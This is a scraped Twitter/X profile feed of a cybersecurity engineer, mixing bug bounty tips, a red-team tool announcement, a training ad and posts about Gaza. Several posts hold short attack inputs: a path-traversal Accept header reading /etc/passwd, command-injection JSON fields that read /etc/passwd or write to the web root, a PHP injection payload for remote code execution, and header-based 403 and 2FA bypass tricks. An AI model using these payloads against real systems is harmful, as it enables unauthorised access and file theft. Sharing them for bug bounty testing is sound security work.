Hossam Shady

@Hossam__shady

Followers: 2K | Following: 3K | Media: 24 | Statuses: 2K

Cyber Security Engineer

Joined September 2019
@rednexusacademy
Red Nexus Academy
25 days
We're offering you historic discounts that have never happened before, on the occasion of announcing the strongest partnership in the Arab world with the strongest ally in the cybersecurity field, INE. We were able to provide exclusive discounts, and our goal is your learning and professional journey. Choose the package that suits you and don't miss this opportunity. Full Pack 1- 12 months of access
2
1
8
@Print3M_
Print3M
4 months
I'm releasing my new tool: DllShimmer 🔥 Weaponize DLL hijacking easily. https://t.co/BPP6dJLzuW - backdoor any function, no reverse engineering - all functions proxied, no program crash - built-in debug info and mutex to every function - more... #redteam #malware #security
5
110
387
@_aircorridor
Olexander
4 months
Kubernetes Hacking: Attacking Kubernetes Clusters Using The Kubelet API Explore the ways to execute commands within containers, potentially leading to full control over the cluster: https://t.co/DU0vgzIks9 @three_cube
1
4
9
@cyberchenti
Faiza Seidu-Adam | CyberBuddie
4 months
FREE Azure Labs – Cloud Security Projects Looking to gain hands-on experience with Azure Security Technologies? 📌 Microsoft’s official AZ-500 labs provide real-world cloud security engineering projects. Use them to: ✔️ Build and secure your own cloud environment ✔️ Work on
4
40
330
@nav1n0x
N$
11 months
If your target uses Rails, look for Action View CVE-2019-5418 - File Content Disclosure vuln. Although this is an old bug, it can still be found. Intercept the request in Burp and replace the Accept header with: `Accept: ../../../../../../../../../../etc/passwd{{` #bugbountytips
16
241
1K
@chux13786509
chux
11 months
🔥 403 turned to 200 🔥 Accessing /admin/settings was answered with 403, but using the "Referrer" HTTP header I was able to access pages that were forbidden! This is a common method to bypass a server-side validation that relies on the user accessing only through the website
11
124
868
@Mr_Dark55
./Mr-Dark
11 months
assetfinder https://t.co/W3QT01FUMb | httpx -threads 300 -follow-redirects -silent | rush -j200 'curl -m5 -s -I -H "Origin: https://t.co/32zTSgMhGx" {} | [[ $(grep -c " https://t.co/32zTSgMhGx") -gt 0 ]] && printf "\n\033[0;32m[VUL TO CORS] \033[0m{}"' 2>/dev/null
5
141
704
@0x_rood
🇸🇦 Murtada Bin Abdullah (Rood)
1 year
1- Turn on 2FA 2- Save some authenticated paths like /profile 3- If the website requires 2FA from you, put the path to access it directly without 2FA #bugbountytips
7
27
282
@tamerqdh
Tamer | تامر
1 year
"Please, come and save me" were her last words before she was killed by 350 bullets. We are being killed by monsters who have surpassed psychopaths and serial killers. This is the horrifying experience that Hind Rajab endured in her final moments, which was recreated using artificial intelligence.
223
7K
13K
@Abu_Salah9
MO
1 year
It is sad that the world has grown used to the killing of innocents! How do these scenes pass so simply without anyone seeing them!!
91
1K
2K
@Jayesh25_
Jayesh Madnani
1 year
💰Bug Bounty Tips: Scored a $5,000 bounty via APIs exposed on a Swagger endpoint! 💻 Discovered a Swagger UI showing API endpoints—all endpoints required auth. Instead of stopping there, I tried something different: using an Authorization token and cookies from a different
11
95
579
@Hossam__shady
Hossam Shady
1 year
have you ever tried to do this {"username": "`cat /etc/passwd`", "password": "test"} {"username": "`touch /var/www/html/hack.html`", "password": "test"}
0
1
8
@nav1n0x
N$
1 year
This is the quickest RCE I've ever gotten. The app has a popup for multi-selection fields. I intercepted the request, expecting XSS or SQLi, but found that the parameter **_session_name= can be exploited to get an #RCE as a surprise. Payload: `&**='.print((`id`)).'` #BugBounty
26
163
942
@0day_exploit_
0 day exploit
2 years
10) httpx -l subdomains2.txt -o httpsub.txt 11) Create private nuclei templates 12) Create https://t.co/FMoLgcLXC6 while true; do nuclei -l httpsub.txt -t ~/Private-Nuclei-Templates/ | anew fuzzresultnuclei9.txt | notify -pc ./provider-config.yaml; sleep 3600; done
1
2
12
@Hossam__shady
Hossam Shady
2 years
let's deep dive into CVES
hossamshady.medium.com
#support_GAZA
0
0
4
@WajdWaqfi
Wajd Waqfi وجد وقفي
2 years
Worth watching…
258
2K
5K
@Hossam__shady
Hossam Shady
2 years
what to do after recon look here for my write-up and wait for the next part : https://t.co/FQVrfK5z1M
hossamshady.medium.com
#Stand_with_Gaza🇵🇸
0
0
0
@RootMoksha
RootMoksha Labs
2 years
Tip for hunt and test path:/login/dbconf.php~ By:@momika233 #BugBounty #bugbountytips #pentest #cybersecurity
1
28
116
@nav1n0x
N$
3 years
4. Use your word list to find hidden parameters. Read this well written article by @KathanP19 https://t.co/HpY5akERR1 5. Use your word list to find hidden subdomains, I found 10s of more subdomains using WL created using the common words used in the source. 3/n
medium.com
Hey Guys!! What's Going on? 👋 I was thinking of Tweeting about parameter discovery in web apps lately, however, while I was composing the…
1
17
118